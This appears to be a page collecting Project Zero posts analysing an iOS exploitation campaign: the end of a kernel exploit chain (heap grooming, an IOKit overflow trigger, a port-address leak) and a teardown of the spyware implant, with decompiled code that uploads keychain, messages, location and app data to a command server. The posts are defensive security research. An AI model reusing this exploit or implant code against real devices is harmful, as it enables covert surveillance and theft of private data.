for ( j = 0; j < 96; ++j ) { // use the first half of these arrays of ports  send_ool_ports_msg(some_of_ports_a[j],                     some_ports_to_send_ool,                     0x200u,                     const_15_or_8,                     0x14u);// 15 or 8 kalloc.4096 of ool_ports  send_kalloc_groomer_msg(some_of_ports_c[j],                          4096,                          stack_buf_for_kalloc_groomer,                          1);// kalloc.4096 of ool_desc}
The kalloc.4096 containing the OOL_PORTS descriptor in the kernel will look like this:

+0x528 : target_port+0x530 : target_port+0xd28 : target_port+0xd30 : target_port
hopefully that approximately alternates with a kalloc.4096 which is empty. This gives them a kalloc.4096 which looks a bit like this:

where the P's are out-of-line ports descriptors with the above layout and the K's are empty kalloc.4096 from the out-of-line memory descriptors.

They then alternate another 96 times, first deserializing a 4104 byte OSData object filled with ASCII '1's and a 4104 kalloc groomer which is empty. Both of these will result in kalloc.6144 allocations, as that's the next size class above kalloc.4096:

This leads to a layout a bit like that, where OSData backing buffers approximately alternate with empty out-of-line memory descriptors in kalloc.6144.Making holesThey destroy the middle half of the kalloc.4096's, hopefully leaving gaps in-between some of the the out-of-line ports descriptors:

Similarly they destroy the middle half of the kalloc.6144 out-of-line memory descriptors:

They reallocate half the amount they just freed via a complex kallocer with 24 allocations, then trigger the overflow:__int64 __fastcall trigger_overflow(mach_port_t userclient,                                    uint32_t bad_length){  int64 struct_out_size;  char struct_out[0x7d8];  char struct_in[0x7d8];  memset(struct_in, 'A', 0x7D8LL);  *(uint32_t*)struct_in = 1;  *(uint32_t*)&struct_in[0x7D4] = bad_length;  struct_out_size = 0x7D8LL;  return IOConnectCallStructMethod(userclient,                                   5,                                   struct_in,                                   0x7D8,                                   struct_out,                                   &struct_out_size);}
To understand what happens here we need to look more closely at exactly how external method calls work:

IOConnectCallStructMethod is a wrapper function implemented in IOKitLib.c, part of the open source IOKitUser project. It's just a wrapper around IOConnectCallMethod:

kern_return_tIOConnectCallStructMethod(mach_port_t connection,      // In                          uint32_t    selector,     // In                          const void* inputStruct,     // In                          size_t      inputStructCnt,  // In                          void*       outputStruct,    // Out                          size_t*     outputStructCnt) // In/Out{  return IOConnectCallMethod(connection,   selector,                             NULL,         0,                             inputStruct,  inputStructCnt,                             NULL,         NULL,                             outputStruct, outputStructCnt);}
IOConnectCallMethod is a more complex wrapper which selects the correct kernel MIG function to call based on the passed arguments; in this case that's io_connect_method:

rtn = io_connect_method(connection,         selector,                        (uint64_t *) input, inputCnt,                        inb_input,          inb_input_size,                        ool_input,          ool_input_size,                        inb_output,         &inb_output_size,                        output,             outputCnt,                        ool_output,         &ool_output_size);
The IOKitLib project doesn't contain the implementation of io_connect_method; neither does the XNU project, so where is it? io_connect_method is a MIG RPC method, defined in the device.defs file in the XNU project. Here's the definition:

routine io_connect_method (      connection      : io_connect_t;in    selector        : uint32_t;in    scalar_input    : io_scalar_inband64_t;in    inband_input    : io_struct_inband_t;in    ool_input       : mach_vm_address_t;in    ool_input_size  : mach_vm_size_t;
out   inband_output   : io_struct_inband_t, CountInOut;out   scalar_output   : io_scalar_inband64_t, CountInOut;in    ool_output      : mach_vm_address_t;inout ool_output_size : mach_vm_size_t);
Running the MIG tool on device.defs will generate the serialization and deserialization C code which userspace and the kernel use to implement the client and server parts of the RPC. This happens as part of the XNU build process.

The first argument to the MIG method is a mach port; this is the port to which the serialized message will be sent.
Receiving in EL1In the mach message send path in ipc_kmsg.c there's the following check:

    if (port->ip_receiver == ipc_space_kernel) {      ...        /*         * Call the server routine, and get the reply message to send.         */        kmsg = ipc_kobject_server(kmsg, option);        if (kmsg == IKM_NULL)            return MACH_MSG_SUCCESS;
If a mach message is sent to a port which has its ip_receiver field set to ipc_space_kernel it's not enqueued onto the receiving port's message queue. Instead the send path is short-circuited and the message is assumed to be a MIG serialized RPC request for the kernel and it's synchronously handled by ipc_kobject_server:

ipc_kmsg_tipc_kobject_server(                   ipc_kmsg_t request,                   mach_msg_option_t __unused option){   ...    int request_msgh_id = request->ikm_header->msgh_id;        /*     * Find out corresponding mig_hash entry if any     */    {        unsigned int i = (unsigned int)MIG_HASH(request_msgh_id);        int max_iter = mig_table_max_displ;                do {            ptr = &mig_buckets[i++ % MAX_MIG_ENTRIES];        } while (request_msgh_id != ptr->num && ptr->num && --max_iter);                if (!ptr->routine || request_msgh_id != ptr->num) {            ptr = (mig_hash_t *)0;            reply_size = mig_reply_size;        } else {            reply_size = ptr->size;        }    }        /* round up for trailer size */    reply_size += MAX_TRAILER_SIZE;    reply = ipc_kmsg_alloc(reply_size);
This function looks up the message's msgh_id field in a table containing all the kernel MIG subsystems (not just those from devices.defs, but also methods for task ports, thread ports, the host port and so on).

From that table it reads the maximum reply message size (which is static in MIG) and allocates a suitably sized reply ipc_kmsg structure. For more details on the ipc_kmsg structure see this blog post from a couple of years ago on using it for exploitation.

It just so happens that the serialized io_connect_method request message falls in kalloc.4096, and the reply message in kalloc.6144, the two zones which have been groomed.

Since both the request and reply message will be using inband structure buffers, the input and output structure buffers passed to the external method will point directly into the request and reply ipc_kmsg structures. Recalling the heap grooming earlier, they'll end up with the following layout:

This is the setup when the vulnerability is triggered; the goal here is to disclose the address of the target port. If the groom succeeded then the bad memmove in the external method will copy from the out-of-line ports descriptor which lies after the request message into the OSData object backing buffer which is after the reply ipc_kmsg structure.

After triggering the bug they read each of the sprayed OSData objects in turn, checking whether they appear to now contain something which looks like a kernel pointer:

for (int m = 0; m < 96; ++m) {  sprintf(k_str_buf, "k_%d", m);  max_len = 102400LL;  if ( iosurface_get_property_wrapper(k_str_buf,                                      property_value_buf,                                      &max_len)) {    found_at = memmem(property_value_buf,                      max_len,                      "\xFF\xFF\xFF",                      3LL);    if ( found_at ) {      found_at = (int *)((char *)found_at - 1);      disclosed_port_address = found_at[1] + ((__int64)*found_at << 32);      break;    }  }}
If this succeeds then they've managed to disclose the kernel address of the target_port ipc_port structure. As we've seen in the previous chains, this is one of the prerequisites for their fake kernel port technique.
try, try, try againThey begin setting up to trigger the bug a second time. They send another complex kalloc groomer to fill in holes in kalloc.4096 and kalloc.6144 then perform two more heap grooms in both those zones. 

In a buffer which will be sent in a kalloc.4096 out-of-line memory descriptor they write two values:

+0x514 : kaddr_of_target_port+0xd14 : kaddr_of_target_port_neighbour (either the port below or above target port)
The neighbour port kernel address will be below, unless the port below starts a 4k page, in which case it's above.

Both C and A here contain the out-of-line memory descriptor buffer with the disclosed port addresses.

They make a similar groom in kalloc.6144, alternating between an out-of-line ports descriptor with 0x201 entries, all of which are MACH_PORT_NULL, and an out-of-line memory descriptor buffer:

The out-of-line ports descriptors are sent to ports from the ports_b array, the out-of-line memory descriptors to ports from ports_d.
They then destroy the middle half of those middle ports (the middle C's and middle D's) and reclaim half of those freed, hopefully leaving the following heap layout:

They then trigger the overflow a second time:

The idea here is to read out of bounds into the kalloc.4096 out-of-line memory descriptor buffers which contain two port pointers, then write those values out-of-bounds off the end of the reply message, somewhere in one of those B out-of-line ports descriptors. They're again creating a situation where an out-of-line ports descriptor gets corrupted to have reference-holding pointers for which a reference was never taken.Path to a fake kernel task portUnlike the previous chains, they don't proceed to destroy the corrupted out-of-line ports descriptor. Instead they destroy their send right to target_port (the port which has had an extra port pointer written into a out-of-line ports descriptor). This means that the out-of-line ports descriptor now has the dangling port pointer, not the task's port namespace table. They destroy before_ports and after_ports then force a GC. Note that this means they no longer have a send right to the dangling ipc_port in their task's port namespace. They still retain their receive right to the port to which the corrupted out-of-line ports descriptor was sent though, so by receiving the message enqueued on that port they can regain the send right to the dangling port.Ports in pipesThis time they proceed to directly try to reallocate the memory backing the target port with a pipe buffer, using the familiar fake port structure.

They fill all the pipe buffers with fake ports using the following context value:

magic << 32 | 0x80000000 | fd << 16 | port_index_on_page
They then receive all the messages containing the out-of-line ports descriptors, looking to see if any of them contain port rights. If any port is found here, then it's the dangling pointer to the target port.

They call mach_port_get_context on the received port and ensure that the upper 32-bits of the context value match the magic value (0x2333) which they set. From the lower 32-bits they determine which pipe fd owns the replacing buffer, and what the offset of the fake port is on that page.

Everything from here proceeds as before. They build a fake clock port in the pipe buffer and use the clock_sleep_trap trick to determine the kASLR slide. They build a fake kernel task port; escape the sandbox, patch the platform policy, add the implant CDHash to the trust cache and spawn the implant as root.

Kategorie: Hacking & Security

Implant Teardown

30 Srpen, 2019 - 02:03
Posted by Ian Beer, Project Zero

In the earlier posts we examined how the attackers gained unsandboxed code execution as root on iPhones. At the end of each chain we saw the attackers calling posix_spawn, passing the path to their implant binary which they dropped in /tmp. This starts the implant running in the background as root. There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system. 

The implant is primarily focused on stealing files and uploading live location data. The implant requests commands from a command and control server every 60 seconds.

Before diving into the code let's take a look at some sample data from a test phone running the implant and communicating with a custom command and control server I developed. To be clear, I created this test specifically for the purposes of demonstrating what the implant enabled the attacker to do and the screenshots are from my device.  The device here is an iPhone 8 running iOS 12.

The implant has access to all the database files (on the victim’s phone) used by popular end-to-end encryption apps like Whatsapp, Telegram and iMessage. We can see here screenshots of the apps on the left, and on the right the contents of the database files stolen by the implant which contain the unencrypted, plain-text of the messages sent and received using the apps:Whatsapp

Here's a conversation in Google Hangouts for iOS and the corresponding database file uploaded by the implant. With some basic SQL we can easily see the plain text of the messages, and even the URL of the images shared.

The implant can upload private files used by all apps on the device; here's an example of the plaintext contents of emails sent via Gmail, which are uploaded to the attacker's server:Gmail
The implant also takes copies of the user's complete contacts database:

And takes copies of all their photos:

Real-time GPS tracking
The implant can also upload the user's location in real time, up to once per minute, if the device is online. Here's a real sample of live location data collected by the implant when I took a trip to Amsterdam with the implant running on a phone in my pocket:

The implant uploads the device's keychain, which contains a huge number of credentials and certificates used on and by the device. For example, the SSIDs and passwords for all saved wifi access points:

  <dict>           <key>UUID</key>           <string>3A9861A1-108E-4B3A-AAEC-C8C9DC79878E</string>     <key>acct</key>           <string>RandomHotelWifiNetwork</string>           <key>agrp</key>           <string>apple</string>           <key>cdat</key>           <date>2019-08-28T08:47:33Z</date>           <key>class</key>           <string>genp</string>           <key>mdat</key>           <date>2019-08-28T08:47:33Z</date>           <key>musr</key>           <data>           </data>           <key>pdmn</key>           <string>ck</string>           <key>persistref</key>           <data>           </data>           <key>sha1</key>           <data>           1FcMkQWZGn3Iol70BW6hkbxQ2rQ=           </data>           <key>svce</key>           <string>AirPort</string>           <key>sync</key>           <integer>0</integer>           <key>tomb</key>           <integer>0</integer>           <key>v_Data</key>           <data>           YWJjZDEyMzQ=           </data>   </dict>
The v_Data field is the plain-text password, stored as base64:

$ echo YWJjZDEyMzQ= | base64 -Dabcd1234
The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account. These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running. Here's an example using the Google OAuth token stored as in the keychain being used to log in to the Gmail web interface on a separate machine:

The implant is embedded in the privilege escalation Mach-O file in the __DATA:__file section. 

From our analysis of the exploits, we know that the fake kernel task port (which gives kernel memory read and write) is always destroyed at the end of the kernel exploit. The implant runs completely in userspace, albeit unsandboxed and as root with entitlements chosen by the attacker to ensure they can still access all the private data they are interested in.

Using jtool we can view the entitlements the implant has. Remember, the attackers have complete control over these as they used the kernel exploit to add the hash of the implant binary's code signature to the kernel trust cache.

$ jtool --ent implant<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ""><plist version="1.0"> <dict> <key>keychain-access-groups</key> <array> <string>*</string> </array>        <key>application-identifier</key>        <string>$(AppIdentifierPrefix)$(CFBundleIdentifier)</string>        <key></key>        <true/>        <key></key>        <true/> </dict></plist>
Many system services on iOS will try to check the entitlements of clients talking to them, and only allow clients with particular entitlements to perform certain actions. This is why, even though the implant is running as root and unsandboxed, it still requires a valid entitlements blob. They're assigning themselves three relevant entitlements:

keychain-access-groups is used to restrict access to secrets stored in the keychain; they've given themselves a wildcard value here. enables the use of CoreLocation without explicit user consent, as long as Location Services is enabled. allows retrieval of the device's phone number.
ReversingThe binary is compiled without optimizations and written in Objective-C. The code snippets here are mostly manually decompiled with a bit of help from hex-rays.StructureThe implant consists of two Objective-C classes: Service and Util and a variety of helper functions.

The implant starts by creating an instance of the Service class and calling the start selector before getting a handle to the current runloop and running it.

-[Service start] {  [self startTimer];  [self upload];}
[Service startTimer] will ensure that the Service instance's timerHandle method is invoked every 60 seconds:

// call timer_handle every 60 seconds-[Service startTimer] {  timer = [NSTimer scheduledTimerWithTimeInterval:60.0                                        target:self                                        selector:SEL(timer_handle)                                        userInfo:NULL                                        repeats:1]  old_timer = self->_timer;  self->_timer = timer;  [old_timer release]}
timer_handle is the main function responsible for handling the command and control communication. Before the device goes in to the timer_handle loop however it first does an initial upload:

-[Service upload] {  [self uploadDevice];  [self requestLocation];  [self requestContacts];  [self requestCallHistory];  [self requestMessage];  [self requestNotes];  [self requestApps];  [self requestKeychain];  [self requestRecordings];  [self requestSmsAttachments];  [self requestSystemMail];  if (!self->_defaultList) {    self->_defaultList = [Util appPriorLists];  }
  [self requestPriorAppData:self->_defaultList];  [self requestPhotoData];    ...}
This performs an initial bulk upload of data from the device. Let's take a look at how these are implemented:

-[Service uploadDevice] {  NSLog(@"uploadDevice");  info = [Util dictOfDeviceInfo];  while( [self postFiles:info remove:1] == 0) {    [NSThread sleepForTimeInterval:10.0];    info = [Util dictOfDeviceInfo];  }}
Note the call to NSLog is really there in the production implant. If you connect the iPhone via a lightning cable to a Mac and open you can see these log messages as the implant runs.

Here's [Util dictOfDeviceInfo]:

+[Util dictOfDeviceInfo] {  struct utsname name = {};  uname(&name);  machine_str = [NSString stringWithCString:name.machine                          encoding:NSUTF8StringEncoding]
   // CoreTelephony private API  device_phone_number = CTSettingCopyMyPhoneNumber();  if (!device_phone_number) {    device_phone_number = @"";  }
  net_str = @"Cellular"  if ([self isWifi]) {    net_str = @"Wifi";  }
  dict = @{@"name":         [[UIDevice currentDevice] name],           @"iccid":        [self ICCID],           @"imei":         [self IMEI],           @"SerialNumber": [self SerialNumber],           @"PhoneNumber":  device_phone_number,           @"version":      [[UIDevice currentDevice] systemVersion]],           @"totaldisk":    [NSNumber numberWithFloat:                              [[self getTotalDiskSpace] stringValue]],           @"freedisk":     [NSNumber numberWithFloat:                              [[self getFreeDiskSpace] stringValue]],           @"platform":     machine_str,           @"net":          net_str}
  path = [@"/tmp" stringByAppendingPathComponent:[NSUUID UUIDString]];
  [dict writeToFile:path atomically:1]    return @{@"device.plist": path}}
Here's the output which gets sent to the server when the implant is run on one of my test devices:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ""><plist version="1.0"><dict> <key>PhoneNumber</key> <string>+447848473659</string> <key>SerialNumber</key> <string>F4GW60LKJC68</string> <key>freedisk</key> <string>48.63801</string> <key>iccid</key> <string>8944200115179096289</string> <key>imei</key> <string>352990092967294</string> <key>name</key> <string>Ian Beer’s iPhone</string> <key>net</key> <string>Wifi</string> <key>platform</key> <string>iPhone10,4</string> <key>totaldisk</key> <string>59.59484</string> <key>version</key> <string>12.1.2</string></dict></plist>
This method collects a myriad of identifiers from the device:
  • the iPhone model
  • the iPhone name ("Ian's iPhone")
  • the ICCID of the SIM card, which uniquely identifies the SIM
  • the iPhone serial number
  • the current phone number
  • the iOS version
  • total and free disk space
  • the currently active network interface (wifi or cellular)

They build an Objective-C dictionary object containing all this information then use the NSUUID class to generate a pseudo-random, unique string. They use that string to create a new file under /tmp, for example /tmp/68753A44-4D6F-1226-9C60-0050E4C00067. They serialize the dictionary object as XML to that file and return a dictionary @{@"device.plist": path} mapping the name "device.plist" to that path in /tmp. This rather odd design pattern of serializing everything to files in /tmp is used throughout the implant.

Let's take a look at how that file will get off the device and up to the attacker's server.

[Service uploadDevice] passes the returned @{@"device.plist": path} dictionary to [Service postFiles]:

  [self postFiles:info remove:1]

-[Service postFiles:files remove:] {  if([[files allKeys] count] == 0) {    return;  }
  sem = dispatch_semaphore_create(0.0)
  base_url_str = [    [@"http://X.X.X.X" stringByTrimmingCharactersInSet:                         [NSCharacterSet whitespaceAndNewlineCharacterSet]]]    full_url_str = [base_url_str stringByAppendingString:@"/upload/info"]
  url = [NSURL URLWithString:full_url_string]
  req = [NSMutableURLRequest requestWithURL:url]  [req setHTTPMethod:@"POST"]  [req setTimeoutInterval:120.0]
  content_type_str = [NSString stringWithFormat:    "multipart/form-data; charset=utf-8;boundary=%@", @"9ff7172192b7"];  [req setValue:content_type_str forHTTPHeaderField:@"Content-Type"]
  // this is set in [Service init], it's SerialNumber  // from [Util SerialNumber]  params_dict = @{@"sn": self->_sn}  body_data = [self buildBodyDataWithParams:params_dict AndFiles:files]
  session = [NSURLSession sharedSession]  NSURLSessionUploadTask* task = [session uploadTaskWithRequest:req           fromData:body_data           completionHandler:             ^(NSData *data, NSURLResponse *response, NSError *error){
                if (error) {                  NSLog(@"postFile %@ Error: %@", _, _)                } else {                  NSLog(@"postFile success %@");                }
                if (remove) {                  // use NSFileManager to remove all the files                }
  [task resume];
  dispatch_semaphore_wait(sem, -1);
The IP address of the server to upload content to is hardcoded in the implant binary. This function uses that address to make an HTTP POST request, passing the contents of the files provided in the files argument as a multipart/form-data payload (with the hardcoded boundary string "9ff7172192b7" delimiting the fields in the body data.)

Let's take a quick look at buildBodyDataWithParams:

[-Service buildBodyDataWithParams:params AndFiles:files] {  data = [NSMutableData data]  for (key in params) {    str = [NSMutableString string]    // the boundary string    [str appendFormat:@"--%@\r\n", "9ff7172192b7"] ;    [str appendFormat:      @"Content-Disposition: form-data; name=\"%@\"\r\n\r\n", key];
    val = [params objectForKeyedSubscript:key];    [str appendFormat:@"%@\r\n", val];
    encoded = [str dataUsingEncoding:NSUTF8StringEncoding];    [data appendData:encoded]  }
  for (file in files) {    str = [NSMutableString string];    // the boundary string    [str appendFormat:@"--%@\r\n", "9ff7172192b7"] ;    [str appendFormat:      @"Content-disposition: form-data; name=\"%@\"; filename=\"%@\"\r\n",      file, file];    [str appendFormat:@"Content-Type: application/octet-stream\r\n\r\n"];
    encoded = [str dataUsingEncoding:NSUTF8StringEncoding];    [data appendData:encoded];
    file_path = [files objectForKeyedSubscript:file];    file_data = [NSData dataWithContentsOfFile:file_path];    [data appendData:file_data];
    newline_encoded = [@"\r\n" dataUsingEncoding:NSUTF8StringEncoding];    [data appendData newline_encoded] ;     }
  final_str = [NSString stringWithFormat:@"--%@--\r\n", @"9ff7172192b7"];  final_encoded = [final_str dataUsingEncoding:NSUTF8StringEncoding];  [data appendData:final_encoded];
  return data}
This is just building a typical HTTP POST request body, embedding the contents of each file as form data.

There's something thus far which is conspicuous only by its absence: is any of this encrypted? The short answer is no: they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear. If you're connected to an unencrypted WiFi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command and control server.

This means that not only is the end-point of the end-to-end encryption offered by messaging apps compromised; the attackers then send all the contents of the end-to-end encrypted messages in plain text over the network to their server.
The command loopOn initial run (immediately after the iPhone has been exploited) the implant performs around a dozen bulk uploads in a similar fashion before going to sleep and being woken up by the operating system every 60 seconds. Let's look at what happens then:

NSTimer will ensure that the [Service timer_handle] method is called every 60 seconds:

-[Service timer_handle] {  NSLog(@"timer trig")  [self status];  [self cmds];}
[Service status] uses the SystemConfiguration framework to determine whether the device is currently connected via WiFi or mobile data network.

[Service cmds] calls [Service remotelist]:

-[Service cmds] {  NSLog(@"cmds");  [self remotelist];  NSLog(@"finally");}

-[Service remotelist] {  ws_nl = [NSCharacterSet whitespaceAndNewlineCharacterSet];  url_str = [remote_url_long stringByTrimmingCharacterInSet:ws_nl];
  NSMutableURLRequestRef url_req = [NSMutableURLRequest alloc];
  full_url_str = [url_str stringByAppendingString:@"/list"];  NSURLRef url = [NSURL URLWithString:full_url_str];
  [url_req initWithURL:url];
  if (self->_cookies) {    [url_req addValue:self->_cookies forHeader:@"Cookie"];  }
  NSURLResponse* resp;  NSData* data = [NSURLConnection sendSynchronousRequest:url_req     returningResponse:&resp     error:0];
  cookie = [self getCookieFromHttpresponse:resp];  if ([cookie length] != 0) {    self->_cookie = cookie;  }
  NSLog(@"Json data %@", [NSString initWithData:data                                   encoding:NSUTF8StringEncoding]);
  err = 0;  json = [NSJSONSerialization JSONObjectWithData:data                              options:0                              error:&err];
  data_obj = [json objectForKey:@"data"];
  NSLog(@"data Result: %@", data_obj);
  cmds_obj = [data_obj objectForKey:@"cmds"];
  NSLog(@"cmds: %@", cmds_obj);
  for (cmd in cmds_obj) {    [self doCommand:cmd];  }}
This method makes an HTTP request to the /list endpoint on the command and control server and expects to receive a JSON-encoded object in the response. It parses that object using the system JSON library (NSJSONSerialization), expecting the JSON to be in the following form:

{ "data" :   { "cmds" :    [      {"cmd"  : <COMMAND_STRING>       "data" : <OPTIONAL_DATA_STRING>      }, ...    ]  }}
Each of the enclosed commands are passed in turn to [Service doCommand]:

-[Service doCommand:cmd_dict] {  cmd_str_raw = [cmd_dict objectForKeyedSubscript:@"cmd"]
  cmd_str = [cmd_str_raw stringByTrimmingCharactersInSet:               [NSCharacterSet whitespaceAndNewlineCharacterSet]];
  if ([cmd_str isEqualToString:@"systemmail"]) {    [self requestSystemMail];  } else if([cmd_str isEqualToString:@"device"]) {    [self uploadDevice];  } else if([cmd_str isEqualToString:@"locate"]) {    [self requestLocation];  } else if([cmd_str isEqualToString:@"contact"]) {    [self requestContact];  } else if([cmd_str isEqualToString:@"callhistory"]) {    [self requestCallHistory];  } else if([cmd_str isEqualToString:@"message"]) {    [self requestMessage];  } else if([cmd_str isEqualToString:@"notes"]) {    [self requestNotes];  } else if([cmd_str isEqualToString:@"applist"]) {    [self requestApps];  } else if([cmd_str isEqualToString:@"keychain"]) {    [self requestKeychain];  } else if([cmd_str isEqualToString:@"recordings"]) {    [self requestRecordings];  } else if([cmd_str isEqualToString:@"msgattach"]) {    [self requestSmsAttachments];  } else if([cmd_str isEqualToString:@"priorapps"]) {    if (!self->_defaultList) {      self->_defaultList = [Util appPriorLists]    }    [self requestPriorAppData:self->_defaultList]  } else if([cmd_str isEqualToString:@"photo"]) {    [self uploadPhoto];  } else if([cmd_str isEqualToString:@"allapp"]) {    dispatch_async(_dispatch_main_q, ^(app)      {        [self requestAllAppData:app]      });  } else if([cmd_str isEqualToString:@"app"]) {    // parameter should be an array of bundle ids    data = [cmd_dict objectForKey:@"data"]    if ([data count] != 0) {      [self requestPriorAppData:data]    }  } else if([cmd_str isEqualToString:@"dl"]) {    [@"/tmp/evd." stringByAppendingString:[[[NSUUID UUID] UUIDString] substringToIndex: 4]]    // it doesn't actually seem to do anything here  } else if([cmd_str isEqualToString:@"shot"]) {    // nop  } else if([cmd_str isEqualToString:@"live"]) {    // nop  }
  cs = [NSCharacterSet whitespaceAndNewlineCharacterSet];  server = [@"http://X.X.X.X:1234" stringByTrimmingCharactersInSet:cs];    full_url_str = [server stringByAppendingString:@"/list/suc?name="];  url = [NSURL URLWithString:[full_url_str stringByAppendingString:cmd_str]];  NSLog(@"s_url: %@", url)
  req = [[NSMutableURLRequest alloc] initWithURL:url];  if (self->_cookies) {    [req addValue:self->_cookies forHTTPHeaderField:@"Cookie"];  }
  id resp;  [NSURLConnection sendSynchronousRequest:req                   returningResponse: &resp                   error: nil];
  resp_cookie = [self getCookieFromHttpresponse:resp]  if ([resp_cookie length] == 0) {    self->_cookie = nil;  } else {    self->_cookie = resp_cookie;  }
  NSLog(@"cookies: %@", self->_cookie)}
This method takes a dictionary with a command and an optional data argument. Here's a list of the supported commands:

systemmail  : upload email from the default Mail.appdevice      : upload device identifiers               (IMEI, phone number, serial number etc)locate      : upload location from CoreLocationcontact     : upload contacts databasecallhistory : upload phone call history message     : upload iMessage/SMSesnotes       : upload notes made in Notes.appapplist     : upload a list of installed non-Apple appskeychain    : upload passwords and certificates stored in the keychainrecordings  : upload voice memos made using the built-in voice memos appmsgattach   : upload SMS and iMessage attachmentspriorapps   : upload app-container directories from hardcoded list of                third-party apps if installed (appPriorLists)photo       : upload photos from the camera rollallapp      : upload container directories of all appsapp         : upload container directories of particular apps by bundle IDdl          : unimplementedshot        : unimplementedlive        : unimplemented
Each command is responsible for uploading its results to the server. After each command is complete a GET request is made to the /list/suc?name=X endpoint, where X is the name of the command which completed. A cookie containing the device serial number is sent along with the GET request.

The majority of these commands work by creating tar archives of fixed lists of directories based on the desired information and the version of iOS which is running. Here, for example, is the implementation of the systemmail command:

-[Service requestSystemMail] {  NSLog(@"requestSystemMail")  maildir = [Util dirOfSystemMail]  if ([maildir length] != 0) {    [Util tarWithSplit:maildir          name:@"systemmail"          block:^(id files) // dictionary {filename:filepath}           {            while ([self postFiles:files] == 0) {              [NSThread sleepForTimeInterval:10.0]            }          }    ]  }}
+[Util dirOfSystemMail] {  return @"/private/var/mobile/Library/Mail";}
This uses the [Util tarWithSplit] method to archive the contents of the /private/var/mobile/Library/Mail folder, which contains the contents of all locally-stored email sent and received with the built-in Apple

Here's another example of a command, locate, which uses CoreLocation to request a geolocation fix for the device. Because the implant has the entitlement set to true this will not prompt the user for permission to access their location.

-[Service requestLocation] {  NSLog(@"requestLocation");  self->_locating = 1;
  if (!self->_lm) {    lm = [[CLLocationManager alloc] init];    [self->_lm release];    self->_lm = lm;        // the delegate's locationManager:didUpdateLocations: selector    // will be called when location information is available    [self->_lm setDelegate:self];    [self->_lm setDesiredAccuracy:kCLLocationAccuracyBest];  }
  [self->lm startUpdatingLocation];}
-[Service locationManager:manager didUpdateLocations:locations] {  [self stopUpdatingLocation];  loc = [locations lastObject];  if (self->_locating) {    struct CLLocationCoordinate2D coord = [loc coordinate];    dict = @{@"lat" : [NSNumber numberWithDouble:coord.latitude],             @"lon" : [NSNumber numberWithDouble:coord.longitude]};
    path = [@"/tmp" stringByAppendingPathComponent[NSUUID UUIDString];    [dict writeToFile:path atomically:1];
    while(1){      fdict = @{@"gps.plist": path};      if([self postFiles:fdict remove:1]) {        break;      }
      [NSThread sleepForTimeInterval:10.0];  }}
Here's the response to the location command, which can be sent up to every 60 seconds (note: I have changed the location to be the peak of the Matterhorn in Switzerland):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ""><plist version="1.0"><dict> <key>lat</key> <real>45.976451000646013</real> <key>lng</key> <real>7.6585657688044914</real></dict></plist>App contentsVarious implant commands enable the attackers to steal the container directories of third-party apps. The implant contains a hardcoded list of apps which will always have their container directories uploaded when the implant starts up. The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.

These container directories are where most iOS apps store all their data; for example, this is where end-to-end encryption apps store unencrypted copies of all sent and received messages. 

Here's the pre-populated list of bundle identifiers for third-party apps, which will always have their container directories uploaded if the apps are installed:
If the attackers were interested in other apps installed on the device they could use a combination of the applist and app commands to get a listing of all installed app ids, then upload a particular app's container directory by id. The allapp command will upload all the container directories for all apps on the device.
ImpactThe implant has access to almost all of the personal information available on the device, which it is able to upload, unencrypted, to the attacker's server. The implant binary does not persist on the device; if the phone is rebooted then the implant will not run until the device is re-exploited when the user visits a compromised site again. Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device.
Kategorie: Hacking & Security

JSC Exploits

30 Srpen, 2019 - 01:55
Posted by Samuel Groß, Project Zero

In this post, we will take a look at the WebKit exploits used to gain an initial foothold onto the iOS device and stage the privilege escalation exploits. All exploits here achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. Although Chrome on iOS would have also been vulnerable to these initial browser exploits, they were only used by the attacker to target Safari and iPhones.  

After some general discussion, this post first provides a short walkthrough of each of the exploited WebKit bugs and how the attackers construct a memory read/write primitive from them, followed by an overview of the techniques used to gain shellcode execution and how they bypassed existing JIT code injection mitigations, namely the “bulletproof JIT”.  

It is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices. The exploit writeups are sorted by the most recent iOS version the exploit supports as indicated by a version check in the exploit code itself. If that version check was missing from the exploit, the supported version range was guessed based on the date of the fix and the previous exploits.

The renderer exploits follow common practice and first gain memory read/write capabilities, then inject shellcode into the JIT region to gain native code execution. In general it seems that every time a new bug was necessary/available, the new bug was exploited for read/write and then plugged into the existing exploit framework. The exploits for the different bugs also appear to generally use common exploit techniques, e.g. by first creating the addrof and fakeobj primitives, then faking JS objects to achieve read/write.

For many of the exploits it is unclear whether they were originally exploited as 0day or as 1day after a fix had already shipped. It is also unknown how the attackers obtained knowledge of the vulnerabilities in the first place. Generally they could have discovered the vulnerabilities themselves or used public exploits released after a fix had shipped. Furthermore, at least for WebKit, it is often possible to extract details of a vulnerability from the public source code repository before the fix has been shipped to users. CVE-2019-8518 can be used to highlight this problem (as can many other recent vulnerabilities). The vulnerability was publicly fixed in WebKit HEAD on Feb 9 2019 with commit 4a23c92e6883. This commit contains a testcase that triggers the issue and causes an out-of-bounds access into a JSArray - a scenario that is usually easy to exploit. However, the fix only shipped to users with the release of iOS 12.2 on March 25 2019, roughly one and a half months after details about the vulnerability were public. An attacker in possession of a working exploit for an older WebKit vulnerability would likely only need a few days to replace the underlying vulnerability and thus gain the capability to exploit up-to-date devices without the need to find new vulnerabilities themselves. It is likely that this happened for at least some of the following exploits.

For comparison, here is how other browser vendors deal with this “patch-gap” or vulnerability window problem:
